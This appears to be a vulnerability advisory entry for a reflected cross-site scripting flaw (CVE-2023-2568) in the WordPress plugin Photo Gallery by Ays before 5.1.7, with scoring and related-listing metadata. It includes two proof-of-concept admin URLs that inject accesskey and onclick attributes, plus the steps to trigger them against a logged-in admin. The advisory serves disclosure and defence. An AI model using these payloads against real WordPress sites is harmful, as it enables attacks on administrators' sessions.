Lucene search
WpvulndbWPEX-ID:B1704A12-459B-4F5D-AA2D-A96646DDAF3EHistoryMay 16, 2023 - 12:00 a.m.
Photo Gallery by Ays < 5.1.7 - Reflected XSS
2023-05-1600:00:00
wpvulndb
44
reflected xss
admin access
control bypass
alt+shift+x
ctrl+alt+x
0.001 Low
EPSS
Percentile
23.0%
The plugin does not escape some parameters before outputting it back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Make a logged in admin open one of the URLs below
v < 5.1.7 - https://example.com/wp-admin/admin.php?page=gallery-photo-gallery-settings&ays_gpg_tab=" accesskey=X onclick=alert(/XSS/)//
v < 5.1.6 - https://example.com/wp-admin/admin.php?page=gallery-photo-gallery&action=edit&gallery=1&ays_gpg_settings_tab=" accesskey=X onclick=alert(/XSS/)//
The XSS will be triggered when pressing ALT+SHIFT+X on Windows and CTRL+ALT+X on OS XRelated
prion
prion
Cross site scripting
2023-06-12 18:15:00
cve
cve
CVE-2023-2568
2023-06-12 18:15:10
wpvulndb
wpvulndb
Photo Gallery by Ays < 5.1.7 - Reflected XSS
2023-05-16 00:00:00
cvelist
cvelist
CVE-2023-2568 Photo Gallery by Ays < 5.1.7 - Reflected XSS
2023-06-12 17:28:23
nvd
nvd
CVE-2023-2568
2023-06-12 18:15:10
wordfence
wordfence